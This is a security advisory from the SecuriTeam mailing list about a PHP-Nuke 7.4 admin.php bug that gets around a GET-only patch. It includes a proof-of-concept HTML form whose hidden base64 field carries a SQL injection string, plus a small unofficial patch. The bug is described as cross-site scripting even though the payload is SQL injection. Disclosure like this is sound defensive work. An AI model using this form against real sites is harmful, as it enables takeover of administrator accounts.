The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PHP-Nuke ViewAdmin Cross Site Scripting Bug
------------------------------------------------------------------------
SUMMARY
" <http://www.phpnuke.org/> PHP-Nuke is a news automated system specially
designed to be used in Intranets and the Internet. The Administrator has
total control of his web site, registered users, and he will have in the
hand a powerful assembly of tools to maintain an active and 100%
interactive web site using databases".
A critical XSS vulnerability in PHP-Nuke allows an attacker to view the
admin acount aid.
DETAILS
Vulnerable Systems:
* PHP-Nuke version 7.4
The above mentioned version of PHP-Nuke suffers from a cross site
scripting condition that literally allows an attacker to manage the admin
acount and even delete it completely using the information provided there.
The bug is actually quite old but the patch that is supposed to fix it can
be totally circumvented using POST queries instead of GET queries.
A sample HTML snippet that demonstrates this:
--------------------------------- Begin Code
---------------------------------
<form name="form1" method="POST"
action="http://www.sitewithphpnuke.com/admin.php";>
<input type="hidden" name="admin"
value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="mod_authors">
<input type="submit" name="Submit" value="Display">
<br>
</p>
</form>
---------------------------------- End Code
----------------------------------
Other vulnerabilities of this kind exist in the current version of
PHP-Nuke. A description of the rest along with relevant patches can be
found at <http://www.mantralab.org> http://www.mantralab.org.
Patch Availability:
A non-official patch is supplied that will solve this specific issue.
Apply it to the admin.php source file:
--------------------------------- Begin Code
---------------------------------
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
---------------------------------- End Code
----------------------------------
ADDITIONAL INFORMATION
The information has been provided by <mailto:mantra@ntj.it> Pierquinto
Manco.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
